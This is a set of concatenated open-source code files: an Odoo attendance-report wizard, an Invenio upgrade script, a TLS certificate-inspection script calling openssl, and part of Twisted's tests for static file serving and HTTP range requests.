class hr_attendance_error(osv.osv_memory):
_name = 'hr.attendance.error'
_description = 'Print Error Attendance Report'
_columns = {
'init_date': fields.date('Starting Date', required=True),
'end_date': fields.date('Ending Date', required=True),
'max_delay': fields.integer('Max. Delay (Min)', required=True)
}
_defaults = {
'init_date': lambda *a: time.strftime('%Y-%m-%d'),
'end_date': lambda *a: time.strftime('%Y-%m-%d'),
'max_delay': 120,
}
def print_report(self, cr, uid, ids, context=None):
emp_ids = []
data_error = self.read(cr, uid, ids, context=context)[0]
date_from = data_error['init_date']
date_to = data_error['end_date']
cr.execute("SELECT id FROM hr_attendance WHERE employee_id IN %s AND to_char(name,'YYYY-mm-dd')<=%s AND to_char(name,'YYYY-mm-dd')>=%s AND action IN %s ORDER BY name" ,(tuple(context['active_ids']), date_to, date_from, tuple(['sign_in','sign_out'])))
attendance_ids = [x[0] for x in cr.fetchall()]
if not attendance_ids:
raise osv.except_osv(_('No Data Available!'), _('No records are found for your selection!'))
attendance_records = self.pool.get('hr.attendance').browse(cr, uid, attendance_ids, context=context)
for rec in attendance_records:
if rec.employee_id.id not in emp_ids:
emp_ids.append(rec.employee_id.id)
data_error['emp_ids'] = emp_ids
datas = {
'ids': [],
'model': 'hr.employee',
'form': data_error
}
return self.pool['report'].get_action(
cr, uid, [], 'hr_attendance.report_attendanceerrors', data=datas, context=context
)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
dset0x/invenio | invenio/modules/oaiharvester/upgrades/oaiharvester_2014_09_09_initial.py | 18 | 2477 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Initial upgrade script from Invenio v1.x to v2.0."""
import sqlalchemy as sa
import warnings
from invenio.modules.upgrader.api import op
from sqlalchemy.exc import OperationalError
from invenio.legacy.dbquery import run_sql
depends_on = []
def info():
return "Add workflows column and drop frequency."
def do_upgrade():
"""Implement your upgrades here."""
try:
op.add_column(
'oaiHARVEST',
sa.Column(
'workflows',
sa.String(length=255),
server_default='',
nullable=False
)
)
except OperationalError:
op.alter_column(
'oaiHARVEST',
'workflows',
existing_type=sa.String(length=255),
nullable=False,
server_default=''
)
# Set default workflow with backwards compatibility for those who have none.
all_data_objects = run_sql("SELECT id, workflows FROM oaiHARVEST")
for object_id, workflows in all_data_objects:
if not workflows:
run_sql("UPDATE oaiHARVEST set workflows=%s WHERE id=%s",
("oaiharvest_harvest_repositories", str(object_id)))
try:
op.drop_column('oaiHARVEST', 'frequency')
except OperationalError as err:
warnings.warn(
"*** Error removing 'oaiHARVEST.frequency' column: {0} ***".format(
str(err)
)
)
def estimate():
"""Estimate running time of upgrade in seconds (optional)."""
return 1
def pre_upgrade():
"""Run pre-upgrade checks (optional)."""
pass
def post_upgrade():
"""Run post-upgrade checks (optional)."""
pass
| gpl-2.0 |
PSJoshi/python_scripts | certificate-details.py | 1 | 3377 | #!/usr/bin/env python
import subprocess
import logging
import os
import sys
from urlparse import urlparse
"""
# use of openssl for ssl certificate details
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null
Certificate validity:
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null |openssl x509 -noout -dates
Issuer details:
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null |openssl x509 -noout -issuer
Subject:
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null |openssl x509 -noout -subject
SHA-1 Fingerprint:
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null |openssl x509 -noout -fingerprint
# use NMAP for ssl related details
psj@psj-desktop:~/Downloads/nmap-6.40$ export SET NMAPDIR=/home/psj/Downloads/nmap-6.40/
Get SSL certificate details
psj@psj-desktop:~/Downloads/nmap-6.40$ nmap google.com -PN -T4 -p 443 --script=ssl-cert
Get cipher details
psj@psj-desktop:~/Downloads/nmap-6.40$ nmap google.com -PN -T4 -p 443 --script=ssl-enum-ciphers
"""
# logging
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger(__name__)
def command_response(domain,cert_command):
cmd = '/usr/bin/openssl s_client -showcerts -connect %s:443</dev/null |openssl x509 -noout -%s' %(domain,cert_command)
response = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
process_response = response.communicate()[0]
return process_response
def get_dates(domain):
start = end = None
domain_response = command_response(domain,'dates')
if domain_response:
split_response = domain_response.split('\n')[:-1]
logger.info("Issue date: %s Expiry date: %s "%(split_response[0],split_response[1]))
start,end = split_response[0].split('=')[1],split_response[1].split('=')[1]
return start,end
def get_issuer(domain):
issuer = None
domain_response = command_response(domain,'issuer')
if domain_response:
split_response = domain_response.split('\n')[:-1]
issuer = split_response[0]
return issuer
def get_subject(domain):
subject = None
domain_response = command_response(domain,'subject')
if domain_response:
split_response = domain_response.split('\n')[:-1]
subject = split_response[0]
return subject
def get_fingerprint(domain):
fingerprint = None
domain_response = command_response(domain,'fingerprint')
if domain_response:
split_response = domain_response.split('\n')[:-1]
fingerprint = split_response[0]
return fingerprint
if __name__ == '__main__':
# extract domain from url
url_details = urlparse('http://www.google.com')
domain = url_details.netloc
# check if openssl is installed or not
if os.path.isfile('/usr/bin/openssl'):
issue_date,expiry_date = get_dates(domain)
logger.info("Certificate issue date:%s" % issue_date)
logger.info("Certificate expiry date:%s" % expiry_date)
    else:
        logger.info("Openssl package is not present on the system. The program cannot continue... Quitting...")
        sys.exit(1)
issuer = get_issuer(domain)
logger.info("Certificate issuer - %s" %issuer)
sub = get_subject(domain)
logger.info("Certificate subject - %s" %sub)
fingerprint = get_fingerprint(domain)
logger.info("Certificate fingerprint - %s" %fingerprint)
| apache-2.0 |
msmolens/VTK | ThirdParty/Twisted/twisted/web/test/test_static.py | 28 | 56293 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.static}.
"""
import inspect
import mimetypes
import os
import re
import StringIO
from zope.interface.verify import verifyObject
from twisted.internet import abstract, interfaces
from twisted.python.runtime import platform
from twisted.python.filepath import FilePath
from twisted.python import log
from twisted.trial.unittest import TestCase
from twisted.web import static, http, script, resource
from twisted.web.server import UnsupportedMethod
from twisted.web.test.test_web import DummyRequest
from twisted.web.test._util import _render
class StaticDataTests(TestCase):
"""
Tests for L{Data}.
"""
def test_headRequest(self):
"""
L{Data.render} returns an empty response body for a I{HEAD} request.
"""
data = static.Data("foo", "bar")
request = DummyRequest([''])
request.method = 'HEAD'
d = _render(data, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), "")
d.addCallback(cbRendered)
return d
def test_invalidMethod(self):
"""
L{Data.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
data = static.Data("foo", "bar")
request = DummyRequest([''])
request.method = 'POST'
self.assertRaises(UnsupportedMethod, data.render, request)
class StaticFileTests(TestCase):
"""
Tests for the basic behavior of L{File}.
"""
def _render(self, resource, request):
return _render(resource, request)
def test_invalidMethod(self):
"""
L{File.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
request = DummyRequest([''])
request.method = 'POST'
path = FilePath(self.mktemp())
path.setContent("foo")
file = static.File(path.path)
self.assertRaises(UnsupportedMethod, file.render, request)
def test_notFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which does not correspond to any file in the path the L{File} was
created with, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest(['foobar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_emptyChild(self):
"""
The C{''} child of a L{File} which corresponds to a directory in the
filesystem is a L{DirectoryLister}.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([''])
child = resource.getChildForRequest(file, request)
self.assertIsInstance(child, static.DirectoryLister)
self.assertEqual(child.path, base.path)
def test_securityViolationNotFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which cannot be looked up in the filesystem due to security
considerations, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest(['..'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_forbiddenResource(self):
"""
If the file in the filesystem which would satisfy a request cannot be
read, L{File.render} sets the HTTP response code to I{FORBIDDEN}.
"""
base = FilePath(self.mktemp())
base.setContent('')
# Make sure we can delete the file later.
self.addCleanup(base.chmod, 0700)
# Get rid of our own read permission.
base.chmod(0)
file = static.File(base.path)
request = DummyRequest([''])
d = self._render(file, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 403)
d.addCallback(cbRendered)
return d
if platform.isWindows():
test_forbiddenResource.skip = "Cannot remove read permission on Windows"
def test_indexNames(self):
"""
If a request is made which encounters a L{File} before a final empty
segment, a file in the L{File} instance's C{indexNames} list which
exists in the path the L{File} was created with is served as the
response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent("baz")
file = static.File(base.path)
file.indexNames = ['foo.bar']
request = DummyRequest([''])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), 'baz')
self.assertEqual(request.outgoingHeaders['content-length'], '3')
d.addCallback(cbRendered)
return d
def test_staticFile(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file in the path the L{File} was created with, that file
is served as the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent("baz")
file = static.File(base.path)
request = DummyRequest(['foo.bar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), 'baz')
self.assertEqual(request.outgoingHeaders['content-length'], '3')
d.addCallback(cbRendered)
return d
def test_staticFileDeletedGetChild(self):
"""
A L{static.File} created for a directory which does not exist should
return childNotFound from L{static.File.getChild}.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest(['foo.bar'])
child = staticFile.getChild("foo.bar", request)
self.assertEqual(child, staticFile.childNotFound)
def test_staticFileDeletedRender(self):
"""
A L{static.File} created for a file which does not exist should render
its C{childNotFound} page.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest(['foo.bar'])
request2 = DummyRequest(['foo.bar'])
d = self._render(staticFile, request)
d2 = self._render(staticFile.childNotFound, request2)
def cbRendered2(ignored):
def cbRendered(ignored):
self.assertEqual(''.join(request.written),
''.join(request2.written))
d.addCallback(cbRendered)
return d
d2.addCallback(cbRendered2)
return d2
def test_headRequest(self):
"""
L{static.File.render} returns an empty response body for I{HEAD}
requests.
"""
path = FilePath(self.mktemp())
path.setContent("foo")
file = static.File(path.path)
request = DummyRequest([''])
request.method = 'HEAD'
d = _render(file, request)
def cbRendered(ignored):
self.assertEqual("".join(request.written), "")
d.addCallback(cbRendered)
return d
def test_processors(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file with an extension which is in the L{File}'s
C{processors} mapping, the processor associated with that extension is
used to serve the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(
"from twisted.web.static import Data\n"
"resource = Data('dynamic world','text/plain')\n")
file = static.File(base.path)
file.processors = {'.bar': script.ResourceScript}
request = DummyRequest(["foo.bar"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), 'dynamic world')
self.assertEqual(request.outgoingHeaders['content-length'], '13')
d.addCallback(cbRendered)
return d
def test_ignoreExt(self):
"""
The list of ignored extensions can be set by passing a value to
L{File.__init__} or by calling L{File.ignoreExt} later.
"""
file = static.File(".")
self.assertEqual(file.ignoredExts, [])
file.ignoreExt(".foo")
file.ignoreExt(".bar")
self.assertEqual(file.ignoredExts, [".foo", ".bar"])
file = static.File(".", ignoredExts=(".bar", ".baz"))
self.assertEqual(file.ignoredExts, [".bar", ".baz"])
def test_ignoredExtensionsIgnored(self):
"""
A request for the I{base} child of a L{File} succeeds with a resource
for the I{base<extension>} file in the path the L{File} was created
with if such a file exists and the L{File} has been configured to
ignore the I{<extension>} extension.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('foo.bar').setContent('baz')
base.child('foo.quux').setContent('foobar')
file = static.File(base.path, ignoredExts=(".bar",))
request = DummyRequest(["foo"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), 'baz')
d.addCallback(cbRendered)
return d
class StaticMakeProducerTests(TestCase):
"""
Tests for L{File.makeProducer}.
"""
def makeResourceWithContent(self, content, type=None, encoding=None):
"""
Make a L{static.File} resource that has C{content} for its content.
@param content: The bytes to use as the contents of the resource.
        @param type: Optional value for the content type of the resource.
        @param encoding: Optional value for the content encoding of the
            resource.
        """
fileName = self.mktemp()
fileObject = open(fileName, 'w')
fileObject.write(content)
fileObject.close()
resource = static.File(fileName)
resource.encoding = encoding
resource.type = type
return resource
def contentHeaders(self, request):
"""
Extract the content-* headers from the L{DummyRequest} C{request}.
        This returns the subset of C{request.outgoingHeaders} consisting of
        headers that start with 'content-'.
"""
contentHeaders = {}
for k, v in request.outgoingHeaders.iteritems():
if k.startswith('content-'):
contentHeaders[k] = v
return contentHeaders
def test_noRangeHeaderGivesNoRangeStaticProducer(self):
"""
makeProducer when no Range header is set returns an instance of
NoRangeStaticProducer.
"""
resource = self.makeResourceWithContent('')
request = DummyRequest([])
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.NoRangeStaticProducer)
def test_noRangeHeaderSets200OK(self):
"""
makeProducer when no Range header is set sets the responseCode on the
request to 'OK'.
"""
resource = self.makeResourceWithContent('')
request = DummyRequest([])
resource.makeProducer(request, resource.openForReading())
self.assertEqual(http.OK, request.responseCode)
def test_noRangeHeaderSetsContentHeaders(self):
"""
makeProducer when no Range header is set sets the Content-* headers
for the response.
"""
length = 123
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(
'a'*length, type=contentType, encoding=contentEncoding)
request = DummyRequest([])
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-type': contentType, 'content-length': str(length),
'content-encoding': contentEncoding},
self.contentHeaders(request))
def test_singleRangeGivesSingleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of SingleRangeStaticProducer.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3'
resource = self.makeResourceWithContent('abcdef')
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the response code on the request to 'Partial Content'.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3'
resource = self.makeResourceWithContent('abcdef')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_singleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3'
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent('abcdef', type=contentType, encoding=contentEncoding)
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-type': contentType, 'content-encoding': contentEncoding,
'content-range': 'bytes 1-3/6', 'content-length': '3'},
self.contentHeaders(request))
def test_singleUnsatisfiableRangeReturnsSingleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests a single unsatisfiable byte range.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=4-10'
resource = self.makeResourceWithContent('abc')
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
    def test_singleUnsatisfiableRangeSets416RequestedRangeNotSatisfiable(self):
        """
        makeProducer sets the response code of the request to 'Requested
        Range Not Satisfiable' when the Range header requests a single
        unsatisfiable byte range.
        """
request = DummyRequest([])
request.headers['range'] = 'bytes=4-10'
resource = self.makeResourceWithContent('abc')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_singleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, unsatisfiable
byte range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=4-10'
contentType = "text/plain"
resource = self.makeResourceWithContent('abc', type=contentType)
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-type': 'text/plain', 'content-length': '0',
'content-range': 'bytes */3'},
self.contentHeaders(request))
def test_singlePartiallyOverlappingRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single byte range that
partly overlaps the resource sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=2-10'
contentType = "text/plain"
resource = self.makeResourceWithContent('abc', type=contentType)
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-type': 'text/plain', 'content-length': '1',
'content-range': 'bytes 2-2/3'},
self.contentHeaders(request))
def test_multipleRangeGivesMultipleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of MultipleRangeStaticProducer.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3,5-6'
resource = self.makeResourceWithContent('abcdef')
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a multiple satisfiable
byte ranges sets the response code on the request to 'Partial
Content'.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3,5-6'
resource = self.makeResourceWithContent('abcdef')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
    def test_multipleRangeSetsContentHeaders(self):
        """
        makeProducer when the Range header requests multiple satisfiable byte
        ranges sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3,5-6'
resource = self.makeResourceWithContent(
'abcdefghijkl', encoding='gzip')
producer = resource.makeProducer(request, resource.openForReading())
contentHeaders = self.contentHeaders(request)
# The only content-* headers set are content-type and content-length.
self.assertEqual(
set(['content-length', 'content-type']),
set(contentHeaders.keys()))
# The content-length depends on the boundary used in the response.
expectedLength = 5
for boundary, offset, size in producer.rangeInfo:
expectedLength += len(boundary)
self.assertEqual(expectedLength, contentHeaders['content-length'])
# Content-type should be set to a value indicating a multipart
# response and the boundary used to separate the parts.
self.assertIn('content-type', contentHeaders)
contentType = contentHeaders['content-type']
self.assertNotIdentical(
None, re.match(
'multipart/byteranges; boundary="[^"]*"\Z', contentType))
# Content-encoding is not set in the response to a multiple range
# response, which is a bit wussy but works well enough with the way
# static.File does content-encodings...
self.assertNotIn('content-encoding', contentHeaders)
def test_multipleUnsatisfiableRangesReturnsMultipleRangeStaticProducer(self):
"""
        makeProducer still returns an instance of L{MultipleRangeStaticProducer}
when the Range header requests multiple ranges, none of which are
satisfiable.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=10-12,15-20'
resource = self.makeResourceWithContent('abc')
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
    def test_multipleUnsatisfiableRangesSets416RequestedRangeNotSatisfiable(self):
        """
        makeProducer sets the response code of the request to 'Requested
        Range Not Satisfiable' when the Range header requests multiple ranges,
        none of which are satisfiable.
        """
request = DummyRequest([])
request.headers['range'] = 'bytes=10-12,15-20'
resource = self.makeResourceWithContent('abc')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_multipleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests multiple ranges, none of
which are satisfiable, sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=4-10'
contentType = "text/plain"
request.headers['range'] = 'bytes=10-12,15-20'
resource = self.makeResourceWithContent('abc', type=contentType)
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-length': '0', 'content-range': 'bytes */3'},
self.contentHeaders(request))
def test_oneSatisfiableRangeIsEnough(self):
"""
makeProducer when the Range header requests multiple ranges, at least
one of which matches, sets the response code to 'Partial Content'.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3,100-200'
resource = self.makeResourceWithContent('abcdef')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
class StaticProducerTests(TestCase):
"""
Tests for the abstract L{StaticProducer}.
"""
def test_stopProducingClosesFile(self):
"""
L{StaticProducer.stopProducing} closes the file object the producer is
producing data from.
"""
fileObject = StringIO.StringIO()
producer = static.StaticProducer(None, fileObject)
producer.stopProducing()
self.assertTrue(fileObject.closed)
def test_stopProducingSetsRequestToNone(self):
"""
L{StaticProducer.stopProducing} sets the request instance variable to
None, which indicates to subclasses' resumeProducing methods that no
more data should be produced.
"""
fileObject = StringIO.StringIO()
producer = static.StaticProducer(DummyRequest([]), fileObject)
producer.stopProducing()
self.assertIdentical(None, producer.request)
class NoRangeStaticProducerTests(TestCase):
"""
Tests for L{NoRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{NoRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.NoRangeStaticProducer(None, None))
def test_resumeProducingProducesContent(self):
"""
L{NoRangeStaticProducer.resumeProducing} writes content from the
resource to the request.
"""
request = DummyRequest([])
content = 'abcdef'
producer = static.NoRangeStaticProducer(
request, StringIO.StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual(content, ''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{NoRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = 'a' * (2*bufferSize + 1)
producer = static.NoRangeStaticProducer(
request, StringIO.StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
expected = [
content[0:bufferSize],
content[bufferSize:2*bufferSize],
content[2*bufferSize:]
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{NoRangeStaticProducer.resumeProducing} calls finish() on the request
after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.NoRangeStaticProducer(
request, StringIO.StringIO('abcdef'))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class SingleRangeStaticProducerTests(TestCase):
"""
Tests for L{SingleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{SingleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.SingleRangeStaticProducer(None, None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{SingleRangeStaticProducer.resumeProducing} writes the given amount
of content, starting at the given offset, from the resource to the
request.
"""
request = DummyRequest([])
content = 'abcdef'
producer = static.SingleRangeStaticProducer(
request, StringIO.StringIO(content), 1, 3)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(content[1:4], ''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{SingleRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = 'abc' * bufferSize
producer = static.SingleRangeStaticProducer(
request, StringIO.StringIO(content), 1, bufferSize+10)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
content[1:bufferSize+1],
content[bufferSize+1:bufferSize+11],
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{SingleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.SingleRangeStaticProducer(
request, StringIO.StringIO('abcdef'), 1, 1)
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class MultipleRangeStaticProducerTests(TestCase):
"""
Tests for L{MultipleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{MultipleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.MultipleRangeStaticProducer(None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} writes the requested
chunks of content from the resource to the request, with the supplied
boundaries in between each chunk.
"""
request = DummyRequest([])
content = 'abcdef'
producer = static.MultipleRangeStaticProducer(
request, StringIO.StringIO(content), [('1', 1, 3), ('2', 5, 1)])
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual('1bcd2f', ''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{MultipleRangeStaticProducer.start} writes about
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
To be specific about the 'about' above: it can write slightly more,
for example in the case where the first boundary plus the first chunk
is less than C{bufferSize} but first boundary plus the first chunk
plus the second boundary is more, but this is unimportant as in
practice the boundaries are fairly small. On the other side, it is
important for performance to bundle up several small chunks into one
call to request.write.
"""
request = DummyRequest([])
content = '0123456789' * 2
producer = static.MultipleRangeStaticProducer(
request, StringIO.StringIO(content),
[('a', 0, 2), ('b', 5, 10), ('c', 0, 0)])
producer.bufferSize = 10
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
'a' + content[0:2] + 'b' + content[5:11],
content[11:15] + 'c',
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.MultipleRangeStaticProducer(
request, StringIO.StringIO('abcdef'), [('', 1, 2)])
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class RangeTests(TestCase):
"""
Tests for I{Range-Header} support in L{twisted.web.static.File}.
@type file: L{file}
@ivar file: Temporary (binary) file containing the content to be served.
@type resource: L{static.File}
@ivar resource: A leaf web resource using C{file} as content.
@type request: L{DummyRequest}
@ivar request: A fake request, requesting C{resource}.
@type catcher: L{list}
@ivar catcher: List which gathers all log information.
"""
def setUp(self):
"""
Create a temporary file with a fixed payload of 64 bytes. Create a
resource for that file and create a request which will be for that
resource. Each test can set a different range header to test different
aspects of the implementation.
"""
path = FilePath(self.mktemp())
# This is just a jumble of random stuff. It's supposed to be a good
# set of data for this test, particularly in order to avoid
# accidentally seeing the right result by having a byte sequence
# repeated at different locations or by having byte values which are
# somehow correlated with their position in the string.
self.payload = ('\xf8u\xf3E\x8c7\xce\x00\x9e\xb6a0y0S\xf0\xef\xac\xb7'
'\xbe\xb5\x17M\x1e\x136k{\x1e\xbe\x0c\x07\x07\t\xd0'
'\xbckY\xf5I\x0b\xb8\x88oZ\x1d\x85b\x1a\xcdk\xf2\x1d'
'&\xfd%\xdd\x82q/A\x10Y\x8b')
path.setContent(self.payload)
self.file = path.open()
self.resource = static.File(self.file.name)
self.resource.isLeaf = 1
self.request = DummyRequest([''])
self.request.uri = self.file.name
self.catcher = []
log.addObserver(self.catcher.append)
def tearDown(self):
"""
Clean up the resource file and the log observer.
"""
self.file.close()
log.removeObserver(self.catcher.append)
def _assertLogged(self, expected):
"""
Asserts that a given log message occurred with an expected message.
"""
logItem = self.catcher.pop()
self.assertEqual(logItem["message"][0], expected)
self.assertEqual(
self.catcher, [], "An additional log occured: %r" % (logItem,))
def test_invalidRanges(self):
"""
L{File._parseRangeHeader} raises L{ValueError} when passed
syntactically invalid byte ranges.
"""
f = self.resource._parseRangeHeader
# there's no =
self.assertRaises(ValueError, f, 'bytes')
# unknown isn't a valid Bytes-Unit
self.assertRaises(ValueError, f, 'unknown=1-2')
# there's no - in =stuff
self.assertRaises(ValueError, f, 'bytes=3')
# both start and end are empty
self.assertRaises(ValueError, f, 'bytes=-')
# start isn't an integer
self.assertRaises(ValueError, f, 'bytes=foo-')
# end isn't an integer
self.assertRaises(ValueError, f, 'bytes=-foo')
# end isn't equal to or greater than start
self.assertRaises(ValueError, f, 'bytes=5-4')
def test_rangeMissingStop(self):
"""
A single bytes range without an explicit stop position is parsed into a
two-tuple giving the start position and C{None}.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=0-'), [(0, None)])
def test_rangeMissingStart(self):
